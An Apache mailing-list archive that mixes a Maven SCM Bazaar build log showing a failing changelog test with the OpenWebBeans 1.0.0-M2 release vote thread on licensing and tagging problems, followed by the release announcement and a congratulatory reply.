>>>[INFO] EXECUTING: bzr commit --message "No msg" >>>[INFO] EXECUTING: bzr push > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > >>>[INFO] EXECUTING: bzr add --no-recurse src/test/java/org >>>[INFO] [src/test/java/org:added] >>>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org >>>[INFO] [src/main/java/org:added] >>>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org/Foo.java >>>[INFO] [src/main/java/org/Foo.java:added] >>>[INFO] EXECUTING: bzr status >>>[INFO] New directory added: > > /home/continuum/continuum-maven/working-directory/80/target/scm-test/updatin > g-copy/src/main/java/org > >>>[INFO] [src/main/java/org/Foo.java:added] >>>[INFO] New directory added: > > /home/continuum/continuum-maven/working-directory/80/target/scm-test/updatin > g-copy/src/test/java/org > >>>[INFO] [pom.xml:modified] >>>[surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 2.921 sec >>>[surefire] Running > > org.apache.maven.scm.provider.bazaar.command.diff.BazaarDiffCommandTest > >>>EXECUTING: bzr init >>>EXECUTING: bzr add > > /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom. > xml > /home/continuum/continuum-maven/working-directory/80/target/test-branch/read > me.txt > /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ > main/java/Application.java > /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ > test/java/Test.java > >>>EXECUTING: bzr commit --message "Add files to test branch" >>>[INFO] Removing > > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy > >>>[INFO] EXECUTING: bzr branch > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy > >>>[INFO] EXECUTING: bzr inventory >>>[INFO] EXECUTING: bzr add --no-recurse project.xml >>>[INFO] [project.xml:added] >>>[INFO] EXECUTING: bzr add --no-recurse src/test/java/org >>>[INFO] [src/test/java/org:added] >>>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org >>>[INFO] [src/main/java/org:added] >>>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org/Foo.java >>>[INFO] [src/main/java/org/Foo.java:added] >>>[INFO] EXECUTING: bzr diff >>>[surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 1.761 sec >>>[surefire] Running > > org.apache.maven.scm.provider.bazaar.command.update.BazaarUpdateCommandTest > >>>EXECUTING: bzr init >>>EXECUTING: bzr add > > /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom. > xml > /home/continuum/continuum-maven/working-directory/80/target/test-branch/read > me.txt > /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ > main/java/Application.java > /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ > test/java/Test.java > >>>EXECUTING: bzr commit --message "Add files to test branch" >>>[INFO] Removing > > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy > >>>[INFO] EXECUTING: bzr branch > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy > >>>[INFO] EXECUTING: bzr inventory >>>[INFO] Removing > > /home/continuum/continuum-maven/working-directory/80/target/scm-test/updatin > g-copy > >>>[INFO] EXECUTING: bzr branch > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > /home/continuum/continuum-maven/working-directory/80/target/scm-test/updatin > g-copy > >>>[INFO] EXECUTING: bzr inventory >>>[INFO] EXECUTING: bzr add --no-recurse project.xml >>>[INFO] [project.xml:added] >>>[INFO] EXECUTING: bzr add --no-recurse src/test/java/org >>>[INFO] [src/test/java/org:added] >>>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org >>>[INFO] [src/main/java/org:added] >>>[INFO] EXECUTING: bzr add --no-recurse src/main/java/org/Foo.java >>>[INFO] [src/main/java/org/Foo.java:added] >>>[INFO] EXECUTING: bzr status >>>[INFO] [project.xml:added] >>>[INFO] New directory added: > > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy/src/main/java/org > >>>[INFO] [src/main/java/org/Foo.java:added] >>>[INFO] New directory added: > > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy/src/test/java/org > >>>[INFO] [readme.txt:modified] >>>[INFO] EXECUTING: bzr commit --message "No msg" >>>[INFO] EXECUTING: bzr push > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > >>>[INFO] EXECUTING: bzr pull >>>[INFO] EXECUTING: bzr revno >>>[INFO] EXECUTING: bzr diff --revision 1 >>>[INFO] EXECUTING: bzr log --verbose >>> <changelog-entry> >>> <date pattern="yyyy-MM-dd">2006-03-28</date> >>> <time pattern="HH:mm:ss">05:05:38</time> >>> <author><![CDATA[continuum > > <[email protected]>]]></author> > >>> <file> >>> <name>project.xml</name> >>> <revision>2</revision> >>> </file> >>> <file> >>> <name>src/main/java/org/</name> >>> <revision>2</revision> >>> </file> >>> <file> >>> <name>src/main/java/org/Foo.java</name> >>> <revision>2</revision> >>> </file> >>> <file> >>> <name>src/test/java/org/</name> >>> <revision>2</revision> >>> </file> >>> <file> >>> <name>readme.txt</name> >>> <revision>2</revision> >>> </file> >>> <msg><![CDATA[No msg]]></msg> >>> </changelog-entry> >>> >>>[surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 4.862 sec >>>[surefire] Running > > org.apache.maven.scm.provider.bazaar.command.changelog.BazaarChangeLogComman > dTckTest > >>>EXECUTING: bzr init >>>EXECUTING: bzr add > > /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom. > xml > /home/continuum/continuum-maven/working-directory/80/target/test-branch/read > me.txt > /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ > main/java/Application.java > /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/ > test/java/Test.java > >>>EXECUTING: bzr commit --message "Add files to test branch" >>>[INFO] Removing > > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy > >>>[INFO] EXECUTING: bzr branch > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > /home/continuum/continuum-maven/working-directory/80/target/scm-test/working > -copy > >>>[INFO] EXECUTING: bzr inventory >>>[INFO] EXECUTING: bzr log --verbose >>>[INFO] EXECUTING: bzr status >>>[INFO] [readme.txt:modified] >>>[INFO] EXECUTING: bzr commit --message "Second changelog" >>>[INFO] EXECUTING: bzr push > > /home/continuum/continuum-maven/working-directory/80/target/test-branch > >>>[INFO] EXECUTING: bzr log --verbose >>>[INFO] EXECUTING: bzr log --verbose >>>[surefire] Tests run: 1, Failures: 1, Errors: 0, Time elapsed: 3.115 sec > > <<<<<<<< FAILURE !! > >>>[surefire] Running > > org.apache.maven.scm.provider.bazaar.command.changelog.BazaarChangeLogConsum > erTest > >>>[surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 0.031 sec >>>[INFO] ------------------------------------------------------------------- > > --------- > >>>[ERROR] BUILD ERROR >>>[INFO] ------------------------------------------------------------------- > > --------- > >>>[INFO] There are test failures. >>>[INFO] ------------------------------------------------------------------- > > --------- > >>>[INFO] For more information, run Maven with the -e switch >>>[INFO] ------------------------------------------------------------------- > > --------- > >>>[INFO] Total time: 28 seconds >>>[INFO] Finished at: Tue Mar 28 05:05:42 PST 2006 >>>[INFO] Final Memory: 7M/159M >>>[INFO] ------------------------------------------------------------------- > > --------- > >>>************************************************************************** > > ** > >>> >> >> >> > > > > >
From [email protected] Mon Jun 01 04:11:22 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16780 invoked from network); 1 Jun 2009 04:11:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Jun 2009 04:11:20 -0000 Received: (qmail 76671 invoked by uid 500); 1 Jun 2009 04:11:32 -0000 Delivered-To: [email protected] Received: (qmail 76646 invoked by uid 500); 1 Jun 2009 04:11:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 76636 invoked by uid 99); 1 Jun 2009 04:11:32 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 01 Jun 2009 04:11:32 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web38203.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 01 Jun 2009 04:11:18 +0000 Received: (qmail 56508 invoked by uid 60001); 1 Jun 2009 04:10:57 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1243829457; bh=61X7qVvMl+yAt2OSgrI9ojcONGrX/5kF5QzdwPsMw58=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:Cc:In-Reply-To:MIME-Version:Content-Type; b=C2FWdpZ1xrIIwSxJH/8K1fitaatHqJgWbtsci95RnLReIPq38R7VGqIPg/aT7bbuegOnV6fHEfPVKOpN7D89dCZaM+n1wTNywBBMNXqmhf2NyZbFRltgmmSgiTLd44mpoEm1g//6aQe2orPZhzhZK0gIoJV0Ps5zD8CBGC2xrm4= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:Cc:In-Reply-To:MIME-Version:Content-Type; b=YjNUoQ361e9s5aZkhKsHReKXvFjUuKePGuXzL0Xru5P7GxujHcNOXi3Q+Xv93nuJW9t8QTO75bn4Btapk54zQNH0zUcIL+lKU86K1DwT18onvNP717MtYA7FhuA8ME6M2rArZwsiE5a7NQcSKi5SfuMAuWdHcWJfv1b6pDFlVk4=; Message-ID: <[email protected]> X-YMail-OSG: zdZPL2MVM1mfHhS7H1MPjt1WP8P2hfuH175ytxqe5HuiFZg4sx7KBTNFxH3rkLnKAB9qhrjTKMUqUAFCFpiHLesLbbYxI1Ytefur1L17af3gvWsLu8SqRJla.2jH.U667Oynd5AD1QDYqa.yjFZYUxswUEehLF_zj4qDuD1Q9cxTJi.C.PR77cnIeRZdtTONaHpd6WZAL4z.4SL367yRk_DX8_Kncnd3LHXPP6ZNd0MCAf5uO8GoD3amylXi4BvbrWAOJYxg1Vytk6LbSHRg0_35h0yPeOe_D.QqRvNqqeLd8Tu_LZpJEPMZqVBU_IEDLIREtvMZmnQ3ud1hICCmX.62NurBytFVMu4VdA2Sb_h8Ago- Received: from [161.129.204.104] by web38203.mail.mud.yahoo.com via HTTP; Sun, 31 May 2009 21:10:56 PDT X-Mailer: YahooMailRC/1277.43 YahooMailWebService/0.7.289.10 References: <{{EMAIL+PHONE}}> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Sun, 31 May 2009 21:10:56 -0700 (PDT) From: Gurkan Erdogdu <[email protected]> Subject: Re: [VOTE] Release OpenWebBeans 1.0.0-incubating-M2(Second Try) To: [email protected] Cc: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-50497759-1243829456=:17674" X-Virus-Checked: Checked by ClamAV on apache.org --0-50497759-1243829456=:17674 Content-Type: text/plain; charset=us-ascii Sorry I do not understand what you mean. I am also not a svn expert. I am looking at http://svn.apache.org/viewvc/incubator/openwebbeans/tags/openwebbeans-1.0.0-incubating-M2/?pathrev=780504. When I opened URL, it shows the Directory revision: 780477 (of 780556) Sticky revision : 780504 I think this helps; But last M2 location is undertags/openwebbeans-1.0.0-incubating-M2. This is the last revision. Please VOTE on this. Thanks; --Gurkan ________________________________ From: sebb <[email protected]> To: [email protected] Sent: Monday, June 1, 2009 1:11:56 AM Subject: Re: [VOTE] Release OpenWebBeans 1.0.0-incubating-M2(Second Try) On 31/05/2009, Gurkan Erdogdu <[email protected]> wrote: > >>>Please provide the SVN revision which applies to the current tag. > > >>Current Tag Revision is 780496 > > > Sorry I have given wrong revision. Current M2 tag is created based on version "At revision 780504" Neither of those agree with what I have just downloaded. What is the "Last Changed Rev:" ? That should be the same as revision in the SVN commit message. > -- Gurkan > > > > > ________________________________ > From: Gurkan Erdogdu <[email protected]> > > To: [email protected] > > Sent: Sunday, May 31, 2009 10:25:14 PM > > Subject: Re: [VOTE] Release OpenWebBeans 1.0.0-incubating-M2(Second Try) > > >>>Please provide the SVN revision which applies to the current tag. > > Current Tag Revision is 780496 > > Thanks; > > > > > ________________________________ > From: sebb <[email protected]> > To: [email protected] > Sent: Sunday, May 31, 2009 10:06:00 PM > Subject: Re: [VOTE] Release OpenWebBeans 1.0.0-incubating-M2(Second Try) > > On 31/05/2009, Gurkan Erdogdu <[email protected]> wrote: > > Hi; > > > > I have corrected the errors. New artifacts can be found at the below URLs. > > > > Plugins repository > > -------------------------- > > http://people.apache.org/~gerdogdu/staging-repo/OWB/1.0.0-incubating-M2-rc2/plugins/org/apache/openwebbeans > > > > Distribution content > > ---------------------------- > > http://people.apache.org/~gerdogdu/staging-repo/OWB/1.0.0-incubating-M2-rc2/distribution/org/apache/openwebbeans/apache-openwebbeans-distribution/1.0.0-incubating-M2/ > > > > SVN New Tag > > ---------------------------- > > http://svn.apache.org/repos/asf/incubator/openwebbeans/tags/openwebbeans-1.0.0-incubating-M2/ > > You appear to have re-used the same tag name. > Tags are normally supposed to be immutable, otherwise there is no > means of knowing what files they relate to. > > Please provide the SVN revision which applies to the current tag. > [The combination of the revision and the tag allows the files to be > uniquely identified, thus getting round the problem of the mutable > tag] > > > thanks; > > > > --Gurkan > > > > > > > > > > > > ________________________________ > > From: sebb <[email protected]> > > To: [email protected] > > Sent: Sunday, May 31, 2009 2:38:07 PM > > Subject: Re: [VOTE] Release OpenWebBeans 1.0.0-incubating-M2 > > > > On 31/05/2009, Gurkan Erdogdu <[email protected]> wrote: > > > > > > > > > >>The .asc.md5 and .asc.sha1 hashes should be deleted as they serve no > > > purpose. > > > > > > >>The POM files in the source archives have the wrong version; they are > > > using > > > >>1.0.0-incubating-SNAPSHOT whereas they should have > > > >>1.0.0-incubating-M2 > > > > > > >>This is a release blocker. Looks like the artifacts were built from > > > >>the wrong SVN checkout. > > > > > > OK, I will correct those. > > > > > > >>>There are some major problems with the NOTICE and LICENSE files. > > > > > > When we created these file, we got help from our mentors. So we corrected > > > those files in the M1 release repeatedly. If you look at the for example, > > > Geronimo NOTICE file, it really like to OWB. I attached Geronimo NOTICE > > > file for example. > > > > I'm afraid that NOTICE file is wrong as well. > > > > See: > > > > http://www.apache.org/dev/release.html#notice-content > > and > > http://apache.org/legal/src-headers.html#notice > > http://apache.org/legal/src-headers.html#faq-examplenotice > > > > > We have included "*licenses*" folder to hold third party license texts to > > > ease reading of the third party licenses. Is it really necessary to put all > > > of these text lines into the LICENCE text? Is it really block release? > > > > > > > Yes, the user must be able to find all the licences by checking the > > LICENSE file. > > > > See: > > > > http://www.apache.org/dev/release.html#distributing-code-under-several-licenses > > > > > Thanks; > > > > > > --- Gurkan > > > > > > > > > ________________________________ > > > From: sebb <[email protected]> > > > To: [email protected] > > > Sent: Saturday, May 30, 2009 2:36:12 PM > > > Subject: Re: [VOTE] Release OpenWebBeans 1.0.0-incubating-M2 > > > > > > On 26/05/2009, Gurkan Erdogdu <[email protected]> wrote: > > > > Hi; > > > > > > > > OpenWebBeans will be an ASL-licensed implementation of the Web Beans > > > Specification which is defined as JSR-299. > > > > > > > > Proposed released artifacts are: > > > > > > > > Plugins repository > > > > -------------------------- > > > > > > > http://people.apache.org/~gerdogdu/staging-repo/OWB/1.0.0-incubating-M2/plugins/org/apache/openwebbeans > > > > > > I've not checked these. > > > > > > > Distribution content > > > > ---------------------------- > > > > > > > http://people.apache.org/~gerdogdu/staging-repo/OWB/1.0.0-incubating-M2/distribution/org/apache/openwebbeans/apache-openwebbeans-distribution/1.0.0-incubating-M2/ > > > > > > The .asc.md5 and .asc.sha1 hashes should be deleted as they serve no > > > purpose. > > > > > > The POM files in the source archives have the wrong version; they are using > > > 1.0.0-incubating-SNAPSHOT whereas they should have > > > 1.0.0-incubating-M2 > > > > > > This is a release blocker. Looks like the artifacts were built from > > > the wrong SVN checkout. > > > > > > The source archives have an additional top-level src/ directory which > > > is not usual. > > > > > > Normally this is included in the parent, e.g. > > > > > > apache-openwebbeans-distribution-1.0.0-incubating-M2-src > > > > > > rather than > > > > > > apache-openwebbeans-distribution-1.0.0-incubating-M2/src > > > > > > This is not a release-blocker. > > > > > > > SVN Tag > > > > ---------------------------- > > > > > > > http://svn.apache.org/repos/asf/incubator/openwebbeans/tags/openwebbeans-1.0.0-incubating-M2/ > > > > > > There are some major problems with the NOTICE and LICENSE files. > > > > > > The NOTICE file must start with: > > > > > > Apache OpenWebBeans > > > Copyright 2008, 2009 The Apache Software Foundation > > > > > > The preceeding 4 lines need to be removed. > > > Also, the NOTICE file is much too long, it should be used for required > > > elements only, so remove any references to other ASF projects and all > > > the headers enclosed in == > > > > > > Some of the other entries include too much data. > > > > > > The LICENSES file only contains the Apache License. It must contain > > > all the required licenses. > > > > > > These are both release blockers. > > > > > > There is at least one file in SVN with inconsistent line-endings: > > > > > > svn pl -v openwebbeans-1.0.0-incubating-M2/samples/guess > > > Properties on > > > 'openwebbeans-1.0.0-incubating-M2\samples\guess': > > > svn: Inconsistent line ending style > > > > > > It looks like the svn:eol-style properties are missing from a lot of files. > > > > > > This makes it difficult to use the code except on OSes with the same > > > EOL as the file happens to be. > > > > > > This ought to be fixed before creating any new tags, because the tags > > > cannot be fixed later. > > > > > > > The release vote on the openwebbeans-dev mailing list resulted in three > > > +1 > > > > votes and no 0 or -1 votes from podling PMC members. > > > > > > My vote is -1, based on the problems with the N & L files, and the > > > incorrect version in the pom.xml > > > > > > > [VOTES] > > > > Kevan Miller +1 Binding (PPMC) > > > > Gurkan Erdogdu +1 (PPMC) > > > > Mark Struberg +1 (PPMC) > > > > > > > > [VOTE Thread] : > > > http://[email protected]/msg00944.html > > > > > > > > More information about the project can be found here: > > > > [Incubation Status Page ] : > > > http://incubator.apache.org/projects/openwebbeans.html > > > > [Project Page] : > > > http://incubator.apache.org/openwebbeans/1.0.0-SNAPSHOT/index.html > > > > [Wiki Page] : http://cwiki.apache.org/OWB/ > > > > [Blog] : http://blogs.apache.org/OWB/ > > > > > > > > Thanks; > > > > > > > > > > > > Gurkan Erdogdu > > > > > > > > > > > > > > > > > > > > > > --------------------------------------------------------------------- > > > To unsubscribe, e-mail: > > > [email protected] > > > For additional commands, e-mail: > > > [email protected] > > > > > > > > > > > > > > > --------------------------------------------------------------------- > > > To unsubscribe, e-mail: > > > [email protected] > > > For additional commands, e-mail: > > > [email protected] > > > > > > > > > > --------------------------------------------------------------------- > > To unsubscribe, e-mail: [email protected] > > For additional commands, e-mail: [email protected] > > > > > > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --0-50497759-1243829456=:17674-- From [email protected] Wed Jun 03 17:58:17 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14386 invoked from network); 3 Jun 2009 17:58:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Jun 2009 17:58:17 -0000 Received: (qmail 10935 invoked by uid 500); 3 Jun 2009 17:58:29 -0000 Delivered-To: [email protected] Received: (qmail 10912 invoked by uid 500); 3 Jun 2009 17:58:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10902 invoked by uid 99); 3 Jun 2009 17:58:28 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 03 Jun 2009 17:58:28 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web38202.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 03 Jun 2009 17:58:19 +0000 Received: (qmail 36637 invoked by uid 60001); 3 Jun 2009 17:57:58 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1244051878; bh=SFIYMSOCnwWEGGIdo+h+c5+lHOSsA1K8xD64nGJuAns=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:Cc:MIME-Version:Content-Type; b=etixvIyGKrdZOuDub+wbLS7+Lm+COnBG0CwMr7MhOtfh0iOuZBmFF74Xv9WJIWi97SZtqzpiQw4RqDyIf42/lnVB3BONDwOT6RY7FrBk6uMkeHZQhd71+IHYfyVTrSu+Isn9+54bmWsf9OUZizQFQMDb1Mqw7E1FIHH/zltueto= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:Cc:MIME-Version:Content-Type; b=mVL4TwN6drDI2bt0ShvT/aDCFywM0vT69iZLLcF5NYI81uZfKHGA1rOWxbCPlKJfk0n5G66iIGW+pRaz8n5WGZHPu/ZPqjV6WVIAbH4Pgx4oiIZOINoeO6/a9e4Br4bCUaCxKbadx1QHlFbp5aSLDJ6SjqzmHOToFEwz0hRN7Ag=; Message-ID: <[email protected]> X-YMail-OSG: DOyZhPEVM1nCqphvHeOHe0TDil0dY5_V1CtDL2HHx1ps.S9uLvY- Received: from [161.129.204.104] by web38202.mail.mud.yahoo.com via HTTP; Wed, 03 Jun 2009 10:57:57 PDT X-Mailer: YahooMailRC/1277.43 YahooMailWebService/0.7.289.10 Date: Wed, 3 Jun 2009 10:57:57 -0700 (PDT) From: Gurkan Erdogdu <[email protected]> Subject: Apache Incubator OpenWebBeans 1.0.0-M2 is Released To: [email protected] Cc: [email protected] MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-1295369481-1244051877=:35693" X-Virus-Checked: Checked by ClamAV on apache.org --0-1295369481-1244051877=:35693 Content-Type: text/plain; charset=us-ascii I am pleased to announce the 1.0.0-M2 release of OpenWebBeans. OpenWebBeans will be an ASL-licensed implementation of the Context and Dependency Injection for Java EE Platform Specification which is defined as JSR-299. This M2 release contains the parts of the specification that enables the developers to start and see more functional aspects of the JSR-299 than M1 release. Please look at the README file to get more about release information. --------------------------------------------------------- - M2 Release Supports the followings --------------------------------------------------------- * Simple WebBeans Support * Producer Method Support * Producer Field Support * JMS WebBeans Support * Inheritance, Stereotype Inheritances and Realization Support * Specialization Support * Event Support * Decorator and Interceptor Support * Experimental XML Configuration Support * Lookup and Dependency Injection Support * Java EE Plugin Support (via ServetContextListener interface) * JPA Persistence Context injection support.(Currently does not support JTA based persistence context.) This release also contains full blown JSF application which is developed by JSF + OWB + JPA. In addition to the implementation of the specification, the project aims to create a new set of Web Beans exposing functionality of other Apache Foundation projects. Feel free to ask any questions about the OpenWebBeans and M2-Release via our user forums. Download URL : ---------------- http://www.apache.org/dist/incubator/openwebbeans/ Project Main Site : -------------------- http://incubator.apache.org/openwebbeans/ User Forum : ------------------- [email protected] Wiki Page : ------------ http://cwiki.apache.org/OWB/ Blog Page : ------------ http://blogs.apache.org/OWB/ Gurkan Erdogdu OpenWebBeans Project Lead --0-1295369481-1244051877=:35693-- From [email protected] Wed Jun 03 18:07:31 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21592 invoked from network); 3 Jun 2009 18:07:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Jun 2009 18:07:31 -0000 Received: (qmail 18532 invoked by uid 500); 3 Jun 2009 18:07:43 -0000 Delivered-To: [email protected] Received: (qmail 18515 invoked by uid 500); 3 Jun 2009 18:07:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18505 invoked by uid 99); 3 Jun 2009 18:07:43 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 03 Jun 2009 18:07:43 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27804.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Wed, 03 Jun 2009 18:07:30 +0000 Received: (qmail 35597 invoked by uid 60001); 3 Jun 2009 18:07:09 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1244052429; bh=1td4q1V7iAl6MZN8zMI41Oj9aypEG69TRUON/DYuQPs=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=FYlERJxwu/QCQgpDOkmAQfgBJ/+ylLWjf0wEm72X4ywSzSpdzC3EYvqMpVO4sLxp+zO8w0TtvBwYNWlfY/6TjAh2tKnwmO4kOx+Bis5GGeG5n87JPa3ydoyDLiRrBja4X8IVR1S0wm38zMW0qDkCMP0A8yX7a5OBzw/wRq4GsD0= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=5N0OvTZUb93KSr0gzfusYX/qZ5iB7h44ibqO0tuSrpFIEqGOAc9BZ1mHYUsqJHOIfF3xuUE1YdzyvW7mnf55w0CgiJ4z/PFo3MS/g+1MUiWaTUNBwWtxW0y+pDbCALD2tA9zI/V7mv8ztxcXOENJAdNktGi8sOGt/pU/hsjH9Ac=; Message-ID: <{{EMAIL+PHONE}}> X-YMail-OSG: X3m9WhcVM1nZXM2qXNbO62LOEzToMH0.C5xCX23FkQ6gsI7GtK6Nv0k4pKlh0kFbreA4RTmBnCI9IXw7wbL2yD5waS9pCxxNoioeHtR837PNdL09dzFtFYflQqoOd0KvAE9nJEZpLixqHVB7MVG1ssvi8_uw_0mY4AuUKlqdi0j_U3NMN.YdsB_FWqwMPq7a14Qu5x4xsXzs0MYY4mgoplthGRZXj6k2AoqKjUK2yogDhtSQLyi_fZMoOCZuIx83y1t_aqs2vgyznfOMHsNvaTt8hqZBYTx9py0CgpD4CsJSUOgrqk.QL6K.XtYnsCA98ZSUDbTmyWdNBcJ4yDHhwnGq6FxJ8imtWuuh5L8- Received: from [161.129.204.104] by web27804.mail.ukl.yahoo.com via HTTP; Wed, 03 Jun 2009 18:07:08 GMT X-Mailer: YahooMailClassic/5.4.12 YahooMailWebService/0.7.289.10 Date: Wed, 3 Jun 2009 18:07:08 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: AW: Apache Incubator OpenWebBeans 1.0.0-M2 is Released To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org gratulation! And thanks, Gurkan for doing the hard parts of OWB and especially all the r= eleasing stuff! :) LieGrue strub --- Gurkan Erdogdu <[email protected]> schrieb am Mi, 3.6.2009: > Von: Gurkan Erdogdu <[email protected]> > Betreff: Apache Incubator OpenWebBeans 1.0.0-M2 is Released > An: [email protected] > CC: [email protected] > Datum: Mittwoch, 3. Juni 2009, 19:57 > I am pleased to announce the 1.0.0-M2 > release of OpenWebBeans. OpenWebBeans will be an > ASL-licensed implementation of the Context and Dependency > Injection for Java EE Platform Specification which is > defined as JSR-299. >=20 > This M2 release contains the parts of the specification > that enables the developers to start and see more functional > aspects of the JSR-299 than M1 release. Please look at the > README file to get more about release information. >=20 > --------------------------------------------------------- > - M2 Release Supports the followings > --------------------------------------------------------- > * Simple WebBeans Support > * Producer Method Support > * Producer Field Support > * JMS WebBeans Support > * Inheritance, Stereotype Inheritances and Realization > Support > * Specialization Support > * Event Support > * Decorator and Interceptor Support > * Experimental XML Configuration Support > * Lookup and Dependency Injection Support > * Java EE Plugin Support (via ServetContextListener > interface) > * JPA Persistence Context injection support.(Currently does > not support JTA based persistence context.) >=20 > This release also contains full blown JSF application which > is developed by JSF + OWB + JPA. >=20 > In addition to the implementation of the specification, the > project aims to create a new set of Web Beans exposing > functionality of other Apache Foundation projects. >=20 > Feel free to ask any questions about the OpenWebBeans and > M2-Release via our user forums. >=20 > Download URL : > ---------------- > http://www.apache.org/dist/incubator/openwebbeans/ >=20 > Project Main Site : > -------------------- > http://incubator.apache.org/openwebbeans/ >=20 > User Forum : > ------------------- > [email protected] >=20 > Wiki Page : > ------------ > http://cwiki.apache.org/OWB/ >=20 > Blog Page : > ------------ > http://blogs.apache.org/OWB/ >=20 > Gurkan Erdogdu > OpenWebBeans Project Lead=20 >=20 >=20 >=20 > =A0 =A0 =A0 =0A=0A=0A From [email protected] Mon Jun 08 16:53:27 2009 Return-Path: <[email protected]> Delivered-To: [email protected] 